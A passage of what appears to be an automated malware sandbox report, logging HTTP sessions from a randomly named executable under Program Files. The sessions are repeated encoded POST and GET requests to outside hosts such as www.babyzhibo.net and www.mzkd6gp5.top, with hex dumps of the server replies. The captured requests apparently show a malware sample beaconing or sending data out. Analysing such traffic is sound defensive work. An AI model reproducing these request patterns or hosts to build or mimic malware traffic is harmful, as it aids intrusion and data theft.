                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 69 5a 41 4d 6d 72 35 7a 6a 4f 6d 5a 43 63 51 64 51 6c 49 4f 39 53 5a 34 30 49 48 42 75 36 47 57 30 77 6f 79 38 50 50 6b 50 35 4d 49 62 77 4d 37 38 35 73 31 47 33 79 53 5a 4d 46 6d 6b 4f 42 32 79 44 75 55 58 70 6d 48 4c 5a 35 78 33 38 52 42 4c 6c 76 66 73 42 4b 77 52 77 76 39 54 73 43 67 30 62 65 6d 69 51 63 50 5a 36 44 47 67 35 37 78 6f 79 69 2f 4f 57 4d 49 38 67 6f 73 33 55 70 69 4a 45 35 33 59 47 4c 4f 74 62 67 76 76 79 74 53 50 56 42 57 76 78 6d 44 34 4a 56 6e 7a 34 6b 64 5a 73 5a 65 64 4e 51 41 52 51 6f 6e 70 43 6d 70 4f 59 4f 46 48 6d 30 70 4c 53 66 67 62 4c 36 56 6d 79 68 34 41 4e 6e 6e 52 41 61 72 4d 47 70 43 52 5a 2f 7a 37 58 49 2f 4b 73 67 68 39 30 55 55 48 67 3d 3d
                                                                    Data Ascii: -0-L9xY=iZAMmr5zjOmZCcQdQlIO9SZ40IHBu6GW0woy8PPkP5MIbwM785s1G3ySZMFmkOB2yDuUXpmHLZ5x38RBLlvfsBKwRwv9TsCg0bemiQcPZ6DGg57xoyi/OWMI8gos3UpiJE53YGLOtbgvvytSPVBWvxmD4JVnz4kdZsZedNQARQonpCmpOYOFHm0pLSfgbL6Vmyh4ANnnRAarMGpCRZ/z7XI/Ksgh90UUHg==
                                                                    Jan 10, 2025 09:12:28.345824957 CET190INHTTP/1.1 400 Bad Request
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 08:12:28 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: d404 Not Found0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.650003192.186.58.31806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:12:29.985951900 CET1815OUTPOST /wn9b/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.babyzhibo.net
                                                                    Origin: http://www.babyzhibo.net
                                                                    Referer: http://www.babyzhibo.net/wn9b/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 69 5a 41 4d 6d 72 35 7a 6a 4f 6d 5a 43 63 51 64 51 6c 49 4f 39 53 5a 34 30 49 48 42 75 36 47 57 30 77 6f 79 38 50 50 6b 50 35 45 49 62 44 30 37 75 75 41 31 46 33 79 53 51 73 46 6e 6b 4f 42 72 79 44 6d 59 58 70 71 58 4c 66 39 78 6d 75 4a 42 44 78 7a 66 6a 42 4b 77 59 51 76 2b 4f 38 43 50 30 61 76 76 69 51 4d 50 5a 36 44 47 67 2f 2f 78 73 6a 69 2f 4a 6d 4d 4a 37 67 6f 67 7a 55 70 61 4a 46 52 6e 59 47 50 65 74 6f 6f 76 76 57 4a 53 43 42 68 57 6a 78 6d 42 74 4a 55 30 7a 2f 74 4e 5a 6f 78 61 64 4d 30 75 52 54 30 6e 6f 55 72 66 65 36 54 66 57 6e 55 46 66 56 6d 46 54 66 4f 69 73 53 6c 33 4b 2b 36 52 4f 53 6a 45 43 78 64 6a 56 76 47 58 73 55 63 43 56 73 52 4c 78 57 45 61 64 6c 4a 72 46 67 57 61 48 50 65 64 61 63 6a 78 34 6c 4c 2f 32 2f 34 37 6f 71 51 68 30 62 5a 6e 46 36 54 43 4c 4a 53 58 64 62 56 6c 7a 2f 43 35 32 58 63 46 7a 7a 51 7a 49 53 35 47 37 63 66 61 44 76 45 68 57 5a 2b 72 58 50 78 66 70 6d 49 74 6b 59 57 38 64 2f 74 52 53 75 2f 57 63 6e 56 54 32 36 62 4e 55 5a 68 6b 75 6f [TRUNCATED]
                                                                    Data Ascii: -0-L9xY=iZAMmr5zjOmZCcQdQlIO9SZ40IHBu6GW0woy8PPkP5EIbD07uuA1F3ySQsFnkOBryDmYXpqXLf9xmuJBDxzfjBKwYQv+O8CP0avviQMPZ6DGg//xsji/JmMJ7gogzUpaJFRnYGPetoovvWJSCBhWjxmBtJU0z/tNZoxadM0uRT0noUrfe6TfWnUFfVmFTfOisSl3K+6ROSjECxdjVvGXsUcCVsRLxWEadlJrFgWaHPedacjx4lL/2/47oqQh0bZnF6TCLJSXdbVlz/C52XcFzzQzIS5G7cfaDvEhWZ+rXPxfpmItkYW8d/tRSu/WcnVT26bNUZhkuomKddG3BZg86gHzXcuvb8Rll+bKQVMGDTGq0Ub1vFrpFsR28uw63hW7ue+hVxYTxbkKbZ8C71/Li1r099TWK59WJ8LmffW45gbGdO7OGMvxd4ZONtuc4rgNpaOzhZsYFD8CNcJiHq3eWTbp6h9MGb6KC6uu7TxLyr4yCa3x9tdeYq2m9hJwD2hgkAS5mph9l/4zuAoZqppM8yuuXd/anPnk3Jv8Vo77ofF4z3y9yLB0qNeD4mI4b/bCFXohcA4ZNIoGPymsSbFrpxrKf2dHd4c6DSGORtJCN0DhJUg2BQ6vELekf8mhvJdXDkFcpXOPFuCnqQHOa+h0ArDET7Ai6/B4NBdV8voY6vHvtAPRq1fxmPNuG88tyH4jQfEZ/u+8Bs9S1aRRGoIFgo+wMIsFV/8i4yf+20Nij1kEmzp3HFojWPWluakkS02Jr/8NRzw/NcaLgc5uxMXxL4MiP4h4Ic2Eh7MN7Iw14pEP5d+hq4+lrBEiy8NzN7yRZOrHLpTrUeWgWc1PFhULCxM50XDonCeVRlxCCCBa0ZQGCUbwTeZBoMqNpgq7++6kUnyhhIueU61SP/NTN1JaozLWvnV125U5QasVu0aOcW89RFVpm7Z9OfNVcR+axYBxEmUA9hNX3B6TFB6jIZG7mDnBQFY4JKSJroib6wIUybqx [TRUNCATED]
                                                                    Jan 10, 2025 09:12:30.919533014 CET190INHTTP/1.1 400 Bad Request
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 08:12:30 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: d404 Not Found0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.650004192.186.58.31806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:12:32.527190924 CET520OUTGET /wn9b/?-0-L9xY=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&Mn=PdO8wZnxGnZX HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.babyzhibo.net
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Jan 10, 2025 09:12:33.531900883 CET1236INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Fri, 10 Jan 2025 08:12:33 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Data Raw: 66 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 63 6d 6e 2d 48 61 6e 73 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 26 23 32 32 33 30 33 3b 26 23 33 35 39 34 36 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 26 23 32 33 34 33 33 3b 26 23 33 35 30 31 33 3b 26 23 32 35 31 36 33 3b 26 23 32 36 34 32 36 3b 26 23 32 39 32 35 36 3b 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 32 33 30 33 3b 26 23 33 35 39 34 36 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 ef b8 8f f0 9f 95 9b 26 23 32 37 34 32 36 3b 26 23 33 36 38 31 34 3b 26 23 32 30 33 35 31 3b 26 23 32 39 39 39 32 3b f0 9f 8e a2 26 23 32 32 33 30 33 3b 26 23 33 35 39 [TRUNCATED]
                                                                    Data Ascii: ffc0<!DOCTYPE html><html lang="zh-cmn-Hans"><head><title>&#22303;&#35946;&#30452;&#25773;&#20813;&#36153;&#19979;&#36733;&#23433;&#35013;&#25163;&#26426;&#29256;</title><meta http-equiv="keywords" content="&#22303;&#35946;&#30452;&#25773;"><meta http-equiv="description" content="&#27426;&#36814;&#20351;&#29992;&#22303;&#35946;&#30452;&#25773;&#25903;&#25345;:32/64bit&#25105;&#20204;&#20026;&#24744;&#25552;&#20379;:&#30495;&#20154;,&#26827;/&#29260;&#20307;&#32946;,&#24425;/&#31080;&#30005;&#23376;,&#22303;&#35946;&#30452;&#25773;&#26368;&#26032;&#29256;&#26412;&#30452;&#25773;app&#21019;&#24314;&#20110;2005&#24180;&#26368;&#21021;&#21482;&#26159;&#19968;&#20010;&#23567;&#22411;&#30340;&#20307;&#32946;&#36164;&#35759;&#32593;&#31449;&#32463;&#36807;&#22810;&#24180;&#30340;&#21457;&#23637;&#22914;&#20170;&#24050;&#32463;&#25104;&#20026;&#20102;&#22269;&#20869;&#30693;&#21517;&#30340;&#20307;&#32946;&#36187;&#20107;&#25253;&#36947;&#23186;&#20307;&#30340;&#210 [TRUNCATED]
                                                                    Jan 10, 2025 09:12:33.531958103 CET1236INData Raw: 26 23 32 38 39 30 39 3b 26 23 32 39 32 33 33 3b 26 23 32 30 33 30 37 3b 26 23 33 32 39 34 36 3b 26 23 33 30 33 34 30 3b 26 23 32 34 31 38 30 3b 26 23 33 36 37 33 31 3b 26 23 32 30 31 35 34 3b ef bc 8c 26 23 32 30 31 38 32 3b 26 23 32 30 32 30 34
                                                                    Data Ascii: &#28909;&#29233;&#20307;&#32946;&#30340;&#24180;&#36731;&#20154;&#20182;&#20204;&#28145;&#30693;&#20307;&#32946;&#22312;&#20154;&#20204;&#29983;&#27963;&#20013;&#30340;&#37325;&#35201;&#24615;&#24076;&#26395;&#36890;&#36807;&#20026;&#
                                                                    Jan 10, 2025 09:12:33.531994104 CET1236INData Raw: 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 61 62 79 7a 68 69 62 6f 2e 6e 65 74 2f 74 65 6d 70 6c 61 74 65 2f 6e 65 77 73 2f 77 61 6e 64 6f 75 6a 69 61 2f 73 74
                                                                    Data Ascii: "><link rel="stylesheet" href="http://www.babyzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3deb034.css"></head><body cache-app-id="12685" data-app-id="94468" data-track="" data-suffix="" data-title="&#22303;
                                                                    Jan 10, 2025 09:12:33.532027006 CET1236INData Raw: 74 68 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f
                                                                    Data Ascii: th.js" crossorigin="anonymous"></script><script type="text/javascript" src="http://www.babyzhibo.net/template/news/wandoujia/static/js/nc.js"></script><script type="text/javascript" src="http://www.babyzhibo.net/template/news/wandoujia/static/
                                                                    Jan 10, 2025 09:12:33.532062054 CET896INData Raw: 22 64 65 74 61 69 6c 22 3e 3c 2f 66 6f 72 6d 3e 3c 74 74 20 64 72 61 67 67 61 62 6c 65 3d 22 62 64 65 39 63 64 22 3e 3c 2f 74 74 3e 3c 76 61 72 20 64 72 6f 70 7a 6f 6e 65 3d 22 65 36 35 31 38 36 22 3e 3c 2f 76 61 72 3e 3c 61 72 65 61 20 64 61 74
                                                                    Data Ascii: "detail"></form><tt draggable="bde9cd"></tt><var dropzone="e65186"></var><area date-time="14251e"></area><div lang="3d7afd" class="lc227f user-info"><img draggable="426ecd" class="m9dfbf avatar" id="header_avatar" src="http://www.babyzhibo.net
                                                                    Jan 10, 2025 09:12:33.532095909 CET1236INData Raw: 75 35 63 33 63 31 20 20 68 61 73 2d 73 75 62 73 20 6e 61 76 2d 69 74 65 6d 20 67 61 6d 65 2d 74 61 67 2d 77 72 61 70 22 3e 3c 61 20 63 6c 61 73 73 3d 22 76 62 38 32 31 36 20 67 61 6d 65 2d 74 61 67 20 66 69 72 73 74 2d 6c 69 6e 6b 22 20 68 72 65
                                                                    Data Ascii: u5c3c1 has-subs nav-item game-tag-wrap"><a class="vb8216 game-tag first-link" href="/game"><span></span></a></li><li class="w4531f nav-item"><a class="xdb6c6 first-link" href="/top/app"><span></span></a></li><li class="y
                                                                    Jan 10, 2025 09:12:33.532130003 CET1236INData Raw: 66 31 22 20 63 6c 61 73 73 3d 22 6c 65 61 31 63 66 20 6c 6f 67 69 6e 2d 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 22 3e 3c 69 6e 73 20 64 69 72 3d 22 30 65 37 31 63 63 22 3e 3c 2f 69 6e 73 3e 3c 73 6d 61 6c 6c 20 6c 61 6e 67 3d 22 64 35 65 66 64 31
                                                                    Data Ascii: f1" class="lea1cf login-modal-content"><ins dir="0e71cc"></ins><small lang="d5efd1"></small><sup draggable="e8b98d"></sup><div draggable="aa0379" class="me1530 title"></div><time dropzone="2c2b4a"></time><tt date-time="dbd0e0"></tt><var
                                                                    Jan 10, 2025 09:12:33.532161951 CET1236INData Raw: 76 35 31 36 62 39 20 76 65 72 69 66 79 2d 62 74 6e 20 61 63 74 69 76 65 22 3e e8 8e b7 e5 8f 96 e9 aa 8c e8 af 81 e7 a0 81 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 6d 61 70 20 64 72 6f 70 7a 6f 6e 65 3d 22 61 61 66 30 61 32 22 3e 3c 2f 6d 61 70
                                                                    Data Ascii: v516b9 verify-btn active"></span></div><map dropzone="aaf0a2"></map><bdo date-time="ab7c9b"></bdo><dfn dir="4ad1b6"></dfn><div dropzone="4fdf1a" class="w66590 input-error-tips"><font lang="45a7ad"></font><ins draggable="a5a5c8">
                                                                    Jan 10, 2025 09:12:33.532196999 CET1236INData Raw: 33 32 34 37 31 31 22 3e 3c 2f 74 69 6d 65 3e 3c 74 74 20 64 72 61 67 67 61 62 6c 65 3d 22 62 62 38 63 38 65 22 3e 3c 2f 74 74 3e 3c 76 61 72 20 64 72 6f 70 7a 6f 6e 65 3d 22 64 39 34 36 36 65 22 3e 3c 2f 76 61 72 3e 3c 64 69 76 20 64 61 74 65 2d
                                                                    Data Ascii: 324711"></time><tt draggable="bb8c8e"></tt><var dropzone="d9466e"></var><div date-time="624654" class="d8ff6a modal-wrap pc"><span class="e31747 close-btn" id="user_close"></span><area date-time="65e97a"></area><map dir="758f86"></map><bdo lan
                                                                    Jan 10, 2025 09:12:33.532232046 CET1236INData Raw: 6d 73 63 6f 70 65 3d 22 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 79 75 65 68 61 69 7a 68 69 62 6f 2e 6e 65 74 22 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 3e 3c 73 75 70 20 64 72 61 67 67 61 62 6c 65
                                                                    Data Ascii: mscope=""><meta content="http://www.yuehaizhibo.net" itemprop="url"><sup draggable="680eb3"></sup><time dropzone="ed5456"></time><tt date-time="53f03b"></tt><div draggable="b87841" class="mf86ef crumb-new clearfix"><var dir="5accc8"></var><are
                                                                    Jan 10, 2025 09:12:33.537167072 CET1236INData Raw: 74 65 2d 74 69 6d 65 3d 22 33 33 36 61 35 64 22 3e 3c 2f 74 69 6d 65 3e 3c 74 74 20 64 69 72 3d 22 66 62 62 32 65 36 22 3e 3c 2f 74 74 3e 3c 76 61 72 20 6c 61 6e 67 3d 22 31 38 39 65 61 31 22 3e 3c 2f 76 61 72 3e 3c 64 69 76 20 6c 61 6e 67 3d 22
                                                                    Data Ascii: te-time="336a5d"></time><tt dir="fbb2e6"></tt><var lang="189ea1"></var><div lang="ea1cfd" class="u8eca1 detail-wrap"><area draggable="996bdd"></area><map dropzone="078c19"></map><bdo date-time="1a2ad9"></bdo><div draggable="e15304" class="v3a8


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.650005104.21.64.1806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:12:39.680250883 CET775OUTPOST /utww/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.mzkd6gp5.top
                                                                    Origin: http://www.mzkd6gp5.top
                                                                    Referer: http://www.mzkd6gp5.top/utww/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 67 6e 37 51 66 6b 4e 30 52 43 4e 4d 75 79 57 46 49 64 36 46 6c 4f 6c 4c 4a 52 75 67 51 6e 45 71 36 32 53 77 6a 56 73 4f 7a 42 39 49 37 37 7a 36 2f 7a 58 59 6f 31 64 77 32 43 38 39 4d 6f 45 2b 33 31 78 6c 58 51 72 64 74 58 31 32 64 43 77 34 34 4a 33 31 33 4b 38 4b 4f 4c 7a 6d 2f 48 63 4f 78 46 31 7a 70 63 34 69 6e 50 78 4f 45 5a 52 54 49 50 63 69 39 57 6c 33 65 62 71 63 42 55 68 63 4c 55 4c 2b 62 52 32 7a 35 4b 66 50 36 59 68 56 66 42 76 65 39 33 57 74 69 4e 42 47 7a 36 6d 38 5a 52 52 72 61 56 4d 66 64 30 51 42 62 76 55 76 37 33 49 32 49 4c 72 58 77 63 57 4f 74 76 53 79 55 50 50 6e 4e 49 41 37 65 45 37 66
                                                                    Data Ascii: -0-L9xY=gn7QfkN0RCNMuyWFId6FlOlLJRugQnEq62SwjVsOzB9I77z6/zXYo1dw2C89MoE+31xlXQrdtX12dCw44J313K8KOLzm/HcOxF1zpc4inPxOEZRTIPci9Wl3ebqcBUhcLUL+bR2z5KfP6YhVfBve93WtiNBGz6m8ZRRraVMfd0QBbvUv73I2ILrXwcWOtvSyUPPnNIA7eE7f
                                                                    Jan 10, 2025 09:12:40.582638025 CET968INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:12:40 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2BkyB%2BECMl8AWZ6kVIFeZyjbCdF4ukGG6UKffVeZoKVwPDqz1y9pybc0iKI0P1WeopKgaThvfjkP0nKKXKWasXm1u06GXD%2B3PachlS4VmeIR8Ew76e4JIG0zzVp0RiLyGTzY"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8ffb340e7f754414-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1598&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=775&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.650006104.21.64.1806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:12:42.217037916 CET799OUTPOST /utww/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.mzkd6gp5.top
                                                                    Origin: http://www.mzkd6gp5.top
                                                                    Referer: http://www.mzkd6gp5.top/utww/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 67 6e 37 51 66 6b 4e 30 52 43 4e 4d 38 43 6d 46 4b 2b 53 46 30 2b 6c 49 51 68 75 67 4c 33 46 68 36 32 65 77 6a 55 6f 65 79 7a 5a 49 37 65 50 36 2b 79 58 59 74 31 64 77 35 69 38 79 43 49 45 6c 33 31 30 50 58 56 72 64 74 58 68 32 64 43 41 34 34 2b 6a 32 32 61 38 49 47 72 7a 6b 69 58 63 4f 78 46 31 7a 70 63 45 49 6e 50 70 4f 45 70 68 54 4f 64 31 51 7a 32 6c 32 5a 62 71 63 58 55 68 59 4c 55 4c 63 62 54 4f 5a 35 49 6e 50 36 63 6c 56 66 77 76 64 79 33 57 76 73 74 41 47 32 4c 2f 72 51 67 5a 72 59 30 6b 6c 64 56 4d 59 65 5a 4a 31 6e 45 49 56 61 62 4c 56 77 65 4f 38 74 50 53 59 57 50 33 6e 66 66 4d 63 52 77 65 38 67 7a 66 6c 6a 61 30 39 67 74 4a 79 4e 49 61 44 76 4b 6d 77 46 51 3d 3d
                                                                    Data Ascii: -0-L9xY=gn7QfkN0RCNM8CmFK+SF0+lIQhugL3Fh62ewjUoeyzZI7eP6+yXYt1dw5i8yCIEl310PXVrdtXh2dCA44+j22a8IGrzkiXcOxF1zpcEInPpOEphTOd1Qz2l2ZbqcXUhYLULcbTOZ5InP6clVfwvdy3WvstAG2L/rQgZrY0kldVMYeZJ1nEIVabLVweO8tPSYWP3nffMcRwe8gzflja09gtJyNIaDvKmwFQ==
                                                                    Jan 10, 2025 09:12:43.098784924 CET970INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:12:43 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B8dOeIYWYRPqMd47IT8Z1o6QnbCukbPxs%2BQHGV7mHH0bdyKFeufT6ypuFc3fpPPQA4gW10RuSaN7c%2Bti9KbZpicDVLwvqHeGmA6lTVBQtDFvoNnQydf4%2F87Zi4%2BeOWVcjnu0"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8ffb341e489042e9-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1687&rtt_var=843&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.650007104.21.64.1806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:12:44.778053045 CET1812OUTPOST /utww/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.mzkd6gp5.top
                                                                    Origin: http://www.mzkd6gp5.top
                                                                    Referer: http://www.mzkd6gp5.top/utww/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
